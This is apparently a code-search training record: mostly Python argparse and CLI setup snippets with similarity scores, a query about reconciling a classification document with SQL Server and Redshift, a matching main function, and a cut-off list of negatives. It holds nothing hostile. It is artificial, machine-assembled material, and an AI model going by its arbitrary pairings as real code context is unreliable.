__init__(self):\n self.config = get_config()\n self.options, self.arguments = get_options(self.config)\n if self.get_bool(\"cache\") and self.get_bool(\"cache_search\") \\\n and not self.get_bool(\"longlist\"):\n integrate_search_cache(\n self.config,\n self.get(\"cachedir\"),\n self.get(\"setpath\")\n )\n if not self.arguments:\n if \"id\" in self.options.__dict__ \\\n and self.options.__dict__[\"id\"]:\n self.arguments.append( self.options.__dict__[\"id\"] )\n del( self.options.__dict__[\"id\"] )\n import sys\n message = \"WARNING: the --id option is deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)\n elif \"city\" in self.options.__dict__ \\\n and self.options.__dict__[\"city\"] \\\n and \"st\" in self.options.__dict__ \\\n and self.options.__dict__[\"st\"]:\n self.arguments.append(\n \"^%s city, %s\" % (\n self.options.__dict__[\"city\"],\n self.options.__dict__[\"st\"]\n )\n )\n del( self.options.__dict__[\"city\"] )\n del( self.options.__dict__[\"st\"] )\n import sys\n message = \"WARNING: the --city/--st options are deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)", "def command_line_arguments():\n\n try:\n parser = argparse.ArgumentParser(description='Log Handler/Cleaner/Copier for Idemia DocAuth')\n\n # Add required arguments.\n parser.add_argument('action', choices=['clean', 'download'], type=str, help='clean or download')\n\n # Parse the arguments\n args = parser.parse_args()\n\n return args\n\n except Exception as err:\n print(err)\n return", "def __init__(self, *args, **kwargs):\n argparse.ArgumentParser.__init__(self, *args, **kwargs)\n self.add_argument(\n '--log-level', env_var='COSA_LOG_LEVEL', default='info',\n choices=log._nameToLevel.keys(), help='Set the log level')", "def fill_args(cls, toolchain, parser):\n pass # pass must be overloaded (if required)", "def configure_commandline(cmdline_arguments: argparse.Namespace) -> Optional[Text]:", "def setup_args():\n parser = argparse.ArgumentParser(\n description=\"Take probe set 
and generate MSA for all variants for \"\n \"each gene\")\n\n parser.add_argument(\n \"-o\", \"--output_path\",\n help=\"Directory to save the output to. Default: Current Directory\",\n type=str, default='.')\n\n parser.add_argument(\n \"-p\", \"--probe\",\n help=\"Path to the probe fasta.\",\n type=str,\n required=True)\n\n parser.add_argument(\n \"-g\", \"--gene_refs\",\n help=\"Directory where gene references are located.\",\n required=True,\n type=str)\n\n args = parser.parse_args()\n return args", "def set_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser( # type: argparse.ArgumentParser\n description=r'''\n -----------------------------------\n < Pull DNA barcodes from FASTQ files >\n -----------------------------------\n /\n \\ ______/ V`-, /\n } /~~\n /_)^ --,r'\n |b |b\n ''',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False\n )\n # Arguments for verbosity and logging\n parser.add_argument( # Verbosity\n '-v',\n '--verbosity',\n dest='verbosity',\n type=str.lower,\n choices=_VERBOSITY_LEVELS,\n default=_VERBOSITY_DEFAULT,\n required=False,\n metavar='verbosity',\n help=\"Set the verbosity level, choose from '%s'; defaults to '%s'\" % (\"', '\".join(_VERBOSITY_LEVELS), _VERBOSITY_DEFAULT)\n )\n parser.add_argument( # Number of cores\n '--parallel',\n dest='num_cores',\n type=_num_cores,\n const=None,\n default=1,\n nargs='?',\n required=False,\n metavar='num jobs',\n help=\"Run %(prog)s in parallel; if passed, can optionally specify the number of jobs to run at once\"\n )\n parser.add_argument( # Output directory\n '-o',\n '--output-directory',\n dest='outdirectory',\n type=str,\n default=_OUTDIR_DEFAULT,\n required=False,\n metavar='output directory',\n help=\"Choose where all output files are to be stored; defaults to '%s'\" % _OUTDIR_DEFAULT\n )\n # Input arguments\n inputs = parser.add_argument_group(\n title='input arguments',\n description='Provide inputs for %(prog)s'\n )\n inputs.add_argument( # Forward FASTQ\n '-f',\n '--forward-fastq',\n dest='forward',\n type=str,\n default=None,\n required=True,\n metavar='FORWARD FASTQ',\n help=\"Provide a filepath for the forward/single FASTQ file\"\n )\n inputs.add_argument( # Reverse FASTQ\n '-r',\n '--reverse-fastq',\n dest='reverse',\n type=str,\n default=None,\n required=False,\n metavar='REVERSE FASTQ',\n help=\"Provide a filepath for the optional reverse FASTQ file\"\n )\n inputs.add_argument( # Sample sheet\n '-s',\n '--sample-sheet',\n dest='sample_sheet',\n type=str,\n default=None,\n required=True,\n metavar='SAMPLE SHEET',\n help=\"Provide a filepath for the sample sheet\"\n )\n inputs.add_argument( # Barcodes file\n '-b',\n '--barcodes',\n dest='barcodes',\n type=str,\n required=True,\n default=None,\n metavar='BARCODES',\n help=\"Provide a filepath for the barcodes CSV file\"\n )\n barcodes = parser.add_argument_group(\n title='barcode options',\n description=\"Set parameters for barcode demultiplexing\"\n )\n barcodes.add_argument( # Number of errors allowed\n '-e',\n '--error',\n dest='error',\n type=int,\n default=_ERROR_DEFAULT,\n required=False,\n metavar='ERROR',\n help=\"This is how many mismatches in the barcode we allowed before rejecting, defaults to %s\" % _ERROR_DEFAULT\n )\n return parser", "def __init__(self, *args, **kwargs):\n argparse.ArgumentParser.__init__(self, *args, **kwargs)\n self.add_argument(\n '--log-level', env_var='COSA_LOG_LEVEL', default='INFO',\n choices=log._nameToLevel.keys(), help='Set the log level')", "def __init__(self):\n self.exin = None\n 
self.dir = None\n self.arg_list = []\n # error 0 on success, 1 on error\n self.error = 1\n self.file_list = []\n self.parser = OptionParser()\n self.char_map = {'nul': '\\0', 'space': ' ',\n 'tab': '\\t', 'doublequote': '\"',\n 'singlequote': \"'\"}", "def __init__(self, *args, **kwargs):\n Cli.__init__(self, *args, **kwargs)\n # Set common arguments\n self.add_argument(\n '--build', default='latest',\n help='Override build id, defaults to latest')\n self.add_argument(\n '--buildroot', default='builds', help='Build diretory')\n self.add_argument(\n '--dump', default=False, action='store_true',\n help='Dump the manfiest and exit')", "def handle_cmdline_args():\n\n parser = argparse.ArgumentParser(\n description='Generate synthetic data from a specification in a json '\n 'file using the \"synth-method\" described in the json file. ')\n\n parser.add_argument(\n '-i', dest='infile', required=True,\n help='The input json file. Must contain a \"synth-method\" property')\n\n parser.add_argument(\n '-o', dest='outfile_prefix', required=True, help='The prefix of the output paths (data json and csv), relative to the QUIPP-pipeline root directory')\n\n args = parser.parse_args()\n return args", "def setUp(self):\n\n self.niceArgV = (\"--long Alpha -n Beta \"\n \"--shortless Gamma -f --myflag \"\n \"--myparam Tofu\").split()\n\n self.nice = WellBehaved()", "def _setup_argument_parser(self, argument_parser):\n pass", "def __init__(self):\n argus = docopt(__doc__, version = 'Analyse folder 1.0')\n self.directory = argus[\"<directory>\"]\n print(argus)", "def __init__(self, args):\n self.args = args", "def initialize_options(self):\n self.base_dir = getcwd()\n self.output_dir = getcwd()\n self.release = None\n self.tag_prefix = 'v'\n self.version = VERSION", "def test_with_empty_args(self):\n parser = Parser()\n args = parser.parser.parse_args([])\n self.assertFalse(args.config)\n self.assertFalse(args.verbose)\n self.assertFalse(args.quiet)", "def setup_parser(self, parser, args):\r\n\r\n pass", "def main_argv():\n main_parse_args(sys.argv[1:])", "def main_argv():\n main_parse_args(sys.argv[1:])", "def __init__(self):\n self.program_args = {}\n self.program_arg_order = []\n self.program_flags = {}\n self.program_flag_order = []\n self.validators = []\n self.advice_functions = {}\n #Register the pre-made validators\n self.register_validator(range_validator, range_validator_advice)\n self.register_validator(enum_validator, enum_validator_advice)\n self.register_validator(bool_validator, bool_validator_advice)\n #Add the quiet flag:\n self.add_program_flag('--quiet',\n FlagDefinition('quiet', None, 'Suppress non-essential output'))\n #Add the help flag\n self.add_program_flag('--help',\n FlagDefinition('help', print_usage, \"Display this notice\"))", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif 
vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def _parse_args(self):\n parser = argparse.ArgumentParser()\n _, args = parser.parse_known_args()\n self.args = [a for a in args if a != '']", "def _configure_args(self, parser: ArgumentParser) -> ArgumentParser:\n pass", "def add_args(self, parser):", "def initialize_options(self):\n #Each user option must be listed here with their default value.\n self.pylint_rcfile = ''", "def _pre_setup(self, project, prog, version, usage, description, epilog,\n default_config_files, default_config_dirs):\n\n if prog is None:\n prog = os.path.basename(sys.argv[0])\n if prog.endswith(\".py\"):\n prog = prog[:-3]\n\n if default_config_files is None:\n default_config_files = find_config_files(project, prog)\n\n if default_config_dirs is None:\n default_config_dirs = find_config_dirs(project, prog)\n\n self._oparser = _CachedArgumentParser(\n prog=prog, usage=usage, description=description, epilog=epilog)\n\n if version is not None:\n self._oparser.add_parser_argument(self._oparser,\n '--version',\n action='version',\n version=version)\n\n return prog, default_config_files, default_config_dirs", "def default_argv():\n\n return ['--quick', # so no config file is loaded\n # Other defaults to minimize side effects on stdout\n '--colors=NoColor', '--no-term-title','--no-banner',\n '--autocall=0']", "def initialize_args(self):\n self.arguments = self.argumentParser.parse_args()\n\n self.plotName = self.arguments[\"plotName\"]\n self.xLabel = self.arguments[\"xLabel\"]\n self.yLabel = self.arguments[\"yLabel\"]\n\n # convert array in json format(representing color) to tuple\n\n self.plotNameColor = tuple(json.loads(self.arguments[\"plotNameColor\"]))\n self.xAxisLabelColor = tuple(json.loads(self.arguments[\"xAxisLabelColor\"]))\n self.yAxisLabelColor = tuple(json.loads(self.arguments[\"yAxisLabelColor\"]))\n self.bottomSpineColor = tuple(json.loads(self.arguments[\"bottomSpineColor\"]))\n self.topSpineColor = tuple(json.loads(self.arguments[\"topSpineColor\"]))\n self.leftSpineColor = tuple(json.loads(self.arguments[\"leftSpineColor\"]))\n self.rightSpineColor = tuple(json.loads(self.arguments[\"rightSpineColor\"]))\n\n self.xTickColor = tuple(json.loads(self.arguments[\"xTickColor\"]))\n self.yTickColor = tuple(json.loads(self.arguments[\"yTickColor\"]))\n\n # bg color\n self.figureBackgroundColor = tuple(json.loads(self.arguments[\"figureBackgroundColor\"]))\n self.axesBackgroundColor = tuple(json.loads(self.arguments[\"axesBackgroundColor\"]))\n\n #region minor locator\n self.xMinorLocatorValue=self.arguments[\"xMinorLocatorValue\"]\n self.yMinorLocatorValue = self.arguments[\"yMinorLocatorValue\"]\n #endregion", "def __init__(self, *args, **kwargs):\n Cli.__init__(self, *args, **kwargs)\n # Set common arguments\n self.add_argument(\n '--build', env_var=\"BUILD\", default='latest',\n help='Override build id, defaults to latest')\n self.add_argument(\n '--buildroot', env_var=\"BUILD_ROOT\", default='builds',\n help='Build directory')\n self.add_argument(\n '--schema', env_var=\"META_SCHEMA\",\n default='/usr/lib/coreos-assembler/v1.json',\n help='Schema to use. 
Set to NONE to skip all validation')", "def __add_arguments__(cls, parser):", "def full_args():\n return setup_args()", "def __init__(self, program, args):\n self.__program = program\n self.__args = args", "def __init__( self ):\n self.arguments = []\n self._opt_specs = []\n self._pos_specs = []\n self._values = {}", "def add_arguments(parser):\n parser.add_argument('-e', '--environment', help='Environment name', required=True)\n parser.add_argument('-w', '--dont-wait', help='Skip waiting for the init to finish', action='store_true')\n parser.add_argument('-l', '--version-label', help='Version label', required=False)", "def setup(self, optparser):\n\t\tpass", "def setup_options_parser(self, argparser):\n pass", "def init(args: Optional[List[bytes]] = None) -> None:\n warnings.warn(_deprecation_warning(), FutureWarning)\n parsed = {}\n if args:\n for arg in args:\n kv = arg.decode().split('=')\n if len(kv) == 2:\n parsed[kv[0]] = kv[1]\n collective.init(**parsed)", "def __init__(self):\n self._parser = argparse.ArgumentParser(description='Arguments for talking to vCenter')\n self._standard_args_group = self._parser.add_argument_group('standard arguments')\n self._specific_args_group = self._parser.add_argument_group('sample-specific arguments')\n\n # because -h is reserved for 'help' we use -s for service\n self._standard_args_group.add_argument('-s', '--host',\n required=True,\n action='store',\n help='vSphere service address to connect to')\n\n # because we want -p for password, we use -o for port\n self._standard_args_group.add_argument('-o', '--port',\n type=int,\n default=443,\n action='store',\n help='Port to connect on')\n\n self._standard_args_group.add_argument('-u', '--user',\n required=True,\n action='store',\n help='User name to use when connecting to host')\n\n self._standard_args_group.add_argument('-p', '--password',\n required=False,\n action='store',\n help='Password to use when connecting to host')\n\n self._standard_args_group.add_argument('-nossl', '--disable-ssl-verification',\n required=False,\n action='store_true',\n help='Disable ssl host certificate verification')", "def setup_cmd_args():\n parser = argparse.ArgumentParser(description=\"Translate XLS files to appropriate XML format for ingestion in FEDEO.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"xlsfile\", help=\"The XLS file to parse\")\n parser.add_argument('-outputdir', help=\"directory to output the XML file\", default='output')\n parser.add_argument('-j', action='store_true', help=\"Also export JSON file\")\n parser.add_argument('-p', action='store_true', help=\"Pretty print XML file\")\n parser.add_argument('-o', action='store_true', help=\"Overwrite output XML file\")\n parser.add_argument('-l', action='store_true', help=\"Skip I_G_LN as mandatory field\", default=False)\n return parser.parse_args()", "def prepare_args():\n parser = argparse.ArgumentParser(description='Args for training')\n \"\"\"Optional arguments for pre-split train/test files\n parser.add_argument('--train_file', type=str, default='data/train.npy')\n parser.add_argument('--test_file', type=str, default='data/test.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/train_labels.npy')\n \"\"\"\n parser.add_argument('--dataset_file', type=str, default='data/dev.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/dev_labels.npy')\n parser.add_argument('--context', type=int, default=1)\n parser.add_argument('--batch_size', type=int, default=8)\n 
parser.add_argument('--optimizer', type=str, default='SGD')\n parser.add_argument('--model_name', type=str, default='SimpleNet')\n parser.add_argument('--lr', type=float, default=3e-4)\n parser.add_argument('--wd', type=float, default=0)\n parser.add_argument('--num_epochs', type=int, default=1000)\n parser.add_argument('--shuffle', action='store_true')\n args_to_ret = parser.parse_args()\n return args_to_ret", "def add_args(self): \n self.parser.add_argument('-u', '--username',\n default=None,\n help='the username for mongoDB (Default: None)')\n\n self.parser.add_argument('-p', '--password',\n default=None,\n help='the password for mongoDB (Default: None)')\n\n self.parser.add_argument('-d', '--database',\n default='grits',\n help='the database for mongoDB (Default: grits)')\n\n self.parser.add_argument('-m', '--mongohost',\n default='localhost',\n help='the hostname for mongoDB (Default: localhost)')\n\n self.parser.add_argument('-f', '--force', \n action='store_true',\n help='do not require confirmation to create indexes (Default: False)')", "def _add_standard_args(parser: ArgumentParser) -> None:\r\n parser.add_argument(\r\n '--username',\r\n required=True,\r\n action=EnvDefault,\r\n envvar='ZFR_USERNAME',\r\n help='Username used to login to Zephyr Scale.'\r\n )\r\n parser.add_argument(\r\n '--password',\r\n required=True,\r\n action=EnvDefault,\r\n envvar='ZFR_PASSWORD',\r\n help='Password used to login to Zephyr Scale.'\r\n )\r\n parser.add_argument(\r\n '--url',\r\n required=True,\r\n action=EnvDefault,\r\n envvar='ZFR_URL',\r\n help='Jira url used to interace with the Zephyr API.'\r\n )\r\n parser.set_defaults(cmd=FolderCommand(parser))", "def init(arg):\n arg.add_argument('-ls', '--list', help='List functions: Takes \"all\", \"partialName*\", \"exactName\"', type=str)\n arg.add_argument('-f', '--func', help='Function to call', type=str)\n arg.add_argument('-a', '--args', help='Argument list for the function', action='append', type=str)\n arg.add_argument('-kw', '--kwargs', help='Keyword arg list, like \"-kw k=b\" or \"-kw k=JSON\"', action='append', type=str)\n arg.add_argument('-q', help='Quiet, use if calling from a script', action='store_true')\n arg.add_argument('-?', dest=\"helpme\", help='Print help for function', action='store_true')\n arg.add_argument('--printResult', help='Print the return value, format if needed', choices=['str', 'json'], type=str, default=None)", "def configure_args():\r\n \r\n parser = ArgumentParser(description='Runs an MDP instance with the Value Iteration algorithm.')\r\n parser.add_argument(\"-problem\", type=str, help = \"Problem file\")\r\n parser.add_argument(\"-error\", type=float, help = \"Error tolerance\")\r\n\r\n args = parser.parse_args()\r\n\r\n if not os.path.isfile(args.problem):\r\n print \"The file described in the 'problem' parameter does not exist or is not a valid file.\"\r\n sys.exit(-1)\r\n\r\n if not (0 < args.error < 1):\r\n print \"The 'error' parameter must be between 0 (zero) and 1 (one).\"\r\n sys.exit(-1)\r\n \r\n return args", "def __init__(self, params_dict):\n\n self._params = []\n \"\"\"\n Initialized by the command line parser with all positional parameters\n supplied on the command line\n \"\"\"\n\n if not params_dict:\n return\n self._param_text = params_dict.get(\"params\")\n self._help_text = params_dict.get(\"text\")", "def setup_cmdline():\n config_file = Script.fullname + '.ini'\n if modUtils.linux():\n log_folder = '/var/log'\n elif modUtils.windows():\n log_folder = 'c:/Temp'\n else:\n log_folder = '.'\n\n 
parser = argparse.ArgumentParser(\n description='Cooling fan manager and MQTT client, version '\n + __version__\n )\n # Position arguments\n parser.add_argument(\n 'config',\n type=argparse.FileType('r'),\n nargs='?',\n default=config_file,\n help='Configuration INI file, default: ' + config_file\n )\n # Options\n parser.add_argument(\n '-V', '--version',\n action='version',\n version=__version__,\n help='Current version of the script.'\n )\n parser.add_argument(\n '-v', '--verbose',\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n default='debug',\n help='Level of logging to the console.'\n )\n parser.add_argument(\n '-l', '--loglevel',\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n default='debug',\n help='Level of logging to a log file.'\n )\n parser.add_argument(\n '-d', '--logdir',\n default=log_folder,\n help='Folder of a log file, default ' + log_folder\n )\n parser.add_argument(\n '-c', '--configuration',\n action='store_true',\n help=\"\"\"Print configuration parameters in form of INI file content.\"\"\"\n )\n # Process command line arguments\n global cmdline\n cmdline = parser.parse_args()", "def __init__(self, args=False):\n self.args = args", "def setup_argparse():\n parser = argparse.ArgumentParser(\n description=_('A simple tool for basic configuration of Speech Dispatcher and problem diagnostics'))\n parser.add_argument('-u', '--create-user-conf',\n dest='create_user_configuration', action=\"store_true\", default=False,\n help=_(\"Create Speech Dispatcher configuration for the given user\"))\n parser.add_argument('-c', '--config-basic-settings-user',\n dest='config_basic_settings_user', action=\"store_true\", default=False,\n help=_(\"Configure basic settings in user configuration\"))\n parser.add_argument('-C', '--config-basic-settings-system',\n dest='config_basic_settings_system', action=\"store_true\", default=False,\n help=_(\"Configure basic settings in system-wide configuration\"))\n parser.add_argument('-d', '--diagnostics', dest='diagnostics',\n action=\"store_true\", default=False,\n help=_(\"Diagnose problems with the current setup\"))\n parser.add_argument('-s', '--test-spd-say', dest='test_spd_say',\n action=\"store_true\", default=False,\n help=_(\"Test connection to Speech Dispatcher using spd-say\"))\n parser.add_argument('--test-festival', dest='test_festival',\n action=\"store_true\", default=False,\n help=_(\"Test whether Festival works as a server\"))\n parser.add_argument('--test-espeak', dest='test_espeak', action=\"store_true\",\n default=False, help=_(\"Test whether Espeak works as a standalone binary\"))\n parser.add_argument('--test-alsa', dest='test_alsa', action=\"store_true\",\n default=False, help=_(\"Test ALSA audio output\"))\n parser.add_argument('--test-pulse', dest='test_pulse', action=\"store_true\",\n default=False, help=_(\"Test Pulse Audio output\"))\n parser.add_argument('-e', '--espeak', dest='use_espeak_synthesis',\n action=\"store_true\", default=use_espeak_synthesis,\n help=_(\"Use espeak to synthesize messages\"))\n parser.add_argument('-n', '--dont-ask', dest='dont_ask',\n action=\"store_true\", default=False,\n help=_(\"Do not ask any questions, always use default values\"))\n parser.add_argument('-D', '--debug', dest='debug',\n action=\"store_true\", default=False,\n help=_(\"Debug a problem and generate a report\"))\n parser.add_argument('--version', dest='version',\n action=\"store_true\",\n help=_(\"Print version and copyright info\"))\n return parser", "def _set_arguments(self):\n cert_location 
= f\"dependencies{sep}certificates{sep}localuser.crt\"\n key_location = f\"dependencies{sep}certificates{sep}localuser.key\"\n assert Path(cert_location).exists(), (\n f\"The certificate isn't \"\n f\"present at location {Path(cert_location).absolute()}\"\n )\n assert Path(key_location).exists(), (\n f\"The certificate key isn't \"\n f\"present at location {Path(key_location).absolute()}\"\n )\n self._arguments = [\n (\n \"test-certificate-verify\",\n [\"-k\", key_location, \"-c\", cert_location],\n ),\n (\n \"test-sig-algs\",\n [],\n ),\n (\n \"test-clienthello-md5\",\n [],\n ),\n (\n \"test-tls13-pkcs-signature\",\n [],\n ),\n ]", "def __init__(self, args):\n super().__init__()\n self.args = args", "def test_arg_parser_default_values(self):\n\n parsed_args = self.parser.parse_args([])\n self.assertIsNone(parsed_args.command)\n self.assertFalse(parsed_args.debug)\n self.assertEqual(parsed_args.formatter, 'table')", "def get_args():\n parser = argparse.ArgumentParser(\n description=\"Sets up package within the pheeno's directory.\"\n )\n\n # Required arguments\n parser.add_argument(\"-x\", \"--execute\", action=\"execute\", required=True,\n help=\"something\", default=False)\n\n # Optional arguments\n parser.add_argument(\"-s\", \"--save\", action=\"store\", required=False,\n help=\"something\", default=False)", "def setUp(self):\n setup_testenv()\n self.args = DEFAULT_CLI_ARGS\n self.args['--output'] = ['png']", "def setup_args(**kargs):\n args = [get_nupack_exec_path(kargs['exec_name']),\n '-material', kargs['material'], '-sodium', kargs['sodium'],\n '-magnesium', kargs['magnesium'], '-dangles', kargs['dangles'], '-T', kargs['T']]\n if kargs['multi']: args += ['-multi']\n if kargs['pseudo']: args += ['-pseudo']\n return args", "def main(self):\n self.declare_opts()\n options = vars(self.parser.parse_args())\n # Set log file to os.devnull in daemon mode to avoid logging to\n # std(out|err).\n # TODO: Probably useless. To be checked\n #if options.__dict__.get('daemon', False) and \\\n # not options.__dict__.get('logfile', False):\n # options.__dict__['logfile'] = devnull\n self.options.update(options)\n clean_dict(self.options)", "def __init__(self, name, progname):\n self.name = name\n self.progname = progname\n self.progargs = \"\"", "def setup_args(self):\n self.parser = argparse.ArgumentParser()\n self.group = self.parser.add_mutually_exclusive_group()\n\n self.group.add_argument('-a', '--add', help='Adds a new task to the task list', action='store_true')\n self.group.add_argument('-r', '--remove', help='Removes a task from the task list', action='store_true')\n self.group.add_argument('-f', '--finish', help='Sets a task to be finished', action='store_true')\n self.group.add_argument('-u', '--unfinish', help='Sets a task to be not finished', action='store_true')\n self.group.add_argument('-c', '--change', help='Updates an existing task', action='store_true')\n self.group.add_argument('-v', '--view', help='View your current task list', action='store_true')\n\n return self.parser", "def main(args=None):\n pass" ]
[ "0.74415267", "0.7358454", "0.7253338", "0.72039276", "0.7177294", "0.71553427", "0.71082044", "0.70940363", "0.7049619", "0.6945425", "0.6943998", "0.69109726", "0.687143", "0.67964226", "0.6782141", "0.6766867", "0.67629826", "0.6739199", "0.67152214", "0.67124844", "0.6708699", "0.66687435", "0.6661174", "0.6629373", "0.65681475", "0.65629065", "0.65627867", "0.6554023", "0.65423876", "0.65423876", "0.65392756", "0.65392756", "0.65384805", "0.6533841", "0.6511449", "0.64848757", "0.64782375", "0.64684933", "0.64615566", "0.6461278", "0.6444898", "0.64409226", "0.6440259", "0.6434877", "0.64274734", "0.6423676", "0.6421975", "0.64196336", "0.64162767", "0.6415422", "0.63788164", "0.6370277", "0.6368363", "0.6363682", "0.6362222", "0.6358678", "0.6355973", "0.6351757", "0.6346331", "0.6338244", "0.6338244", "0.6314246", "0.62998897", "0.6297704", "0.629453", "0.62927896", "0.62926334", "0.6292359", "0.6285394", "0.6280449", "0.62787384", "0.6276649", "0.62747806", "0.6272976", "0.6270616", "0.62690467", "0.6267613", "0.6262224", "0.6260897", "0.62603664", "0.6252203", "0.6250976", "0.62439865", "0.62421113", "0.6241558", "0.6234495", "0.62335116", "0.62224334", "0.6216719", "0.62071663", "0.62002504", "0.62000394", "0.61868507", "0.6184209", "0.6183812", "0.6172311", "0.61708915", "0.61645955", "0.61618257", "0.61516225" ]
0.6216561
89
This program tests that the classification document, the SQL Server DB and Redshift DB all agree with each other
def main():
    args, dummy_l_log_filename_s = initialise()          # -- Initialise

    if not alib.init_app(args):
        return alib.FAIL_GENERIC

    work_dir = alib.load_dir(args)
    print('Loading files from {}'.format(work_dir['l_c_dir']))

    work_files = alib.load_files(work_dir, args['quick_debug'])
    # work_dict = alib.load_matching_masterfile(work_files)
    # alib.load_tags(work_dict)
    # alib.print_filenames(work_dict)

    validate_hidden(work_files)

    alib.p_i('Done...')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_snippet_1(self):\n\n text = \"Asimov also wrote mysteries and fantasy, as well as much nonfiction. Most of his popular science books explain concepts in a historical way, going as far back as possible to a time when the science in question was at its simplest stage. Examples include Guide to Science, the three-volume set Understanding Physics, and Asimov's Chronology of Science and Discovery. He wrote on numerous other scientific and non-scientific topics, such as chemistry, astronomy, mathematics, history, biblical exegesis, and literary criticism.\"\n drs = Drs.create_from_natural_language(text)\n expected_drs = Drs.create_from_predicates_string(\"\"\"\n {'word': 'wrote', 'tag': 'v', 'compound': 'wrote', 'entity': '', 'lemma': 'write', 'gender_guess': None,\n 'is_head_token': True, 'refers_to': None, 'negated': 'false', 'type': None}(v2),\n {'word': 'Asimov', 'tag': 'n', 'compound': 'Asimov', 'entity': 'PERSON', 'lemma': 'Asimov',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v0),\n {'word': 'also', 'tag': 'RB', 'compound': 'also', 'entity': '', 'lemma': 'also', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v1),\n {'word': 'mysteries', 'tag': 'n', 'compound': 'mysteries', 'entity': '', 'lemma': 'mystery',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v3),\n {'word': 'fantasy', 'tag': 'n', 'compound': 'fantasy', 'entity': '', 'lemma': 'fantasy',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v5),\n {'word': 'nonfiction', 'tag': 'n', 'compound': 'nonfiction', 'entity': '', 'lemma': 'nonfiction',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v11),\n {'word': 'as', 'tag': 'RB', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v7),\n {'word': 'well', 'tag': 'RB', 'compound': 'well', 'entity': '', 'lemma': 'well', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v8),\n {'word': 'much', 'tag': 'j', 'compound': 'much', 'entity': '', 'lemma': 'much', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v10),\n {'word': 'Most', 'tag': 'j', 'compound': 'Most', 'entity': '', 'lemma': 'Most', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v13),\n {'word': 'books', 'tag': 'n', 'compound': 'books', 'entity': '', 'lemma': 'book', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v18),\n {'word': 'he', 'tag': 'PRP$', 'compound': 'he', 'entity': '', 'lemma': 'he', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v15),\n {'word': 'popular', 'tag': 'j', 'compound': 'popular', 'entity': '', 'lemma': 'popular',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v16),\n {'word': 'science', 'tag': 'n', 'compound': 'science', 'entity': '', 'lemma': 'science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v17),\n {'word': 'explain', 'tag': 'v', 'compound': 'explain', 'entity': '', 'lemma': 'explain',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 
'false', 'type': None}(v19),\n {'word': 'concepts', 'tag': 'n', 'compound': 'concepts', 'entity': '', 'lemma': 'concept',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v20),\n {'word': 'going', 'tag': 'v', 'compound': 'going', 'entity': '', 'lemma': 'go', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v26),\n {'word': 'way', 'tag': 'n', 'compound': 'way', 'entity': '', 'lemma': 'way', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v24),\n {'word': 'historical', 'tag': 'j', 'compound': 'historical', 'entity': '', 'lemma': 'historical',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v23),\n {'word': 'back', 'tag': 'RB', 'compound': 'back', 'entity': '', 'lemma': 'back', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v29),\n {'word': 'to', 'tag': 'IN', 'compound': 'to', 'entity': '', 'lemma': 'to', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'to'}(v32),\n {'word': 'far', 'tag': 'RB', 'compound': 'far', 'entity': '', 'lemma': 'far', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v28),\n {'word': 'as', 'tag': 'RB', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 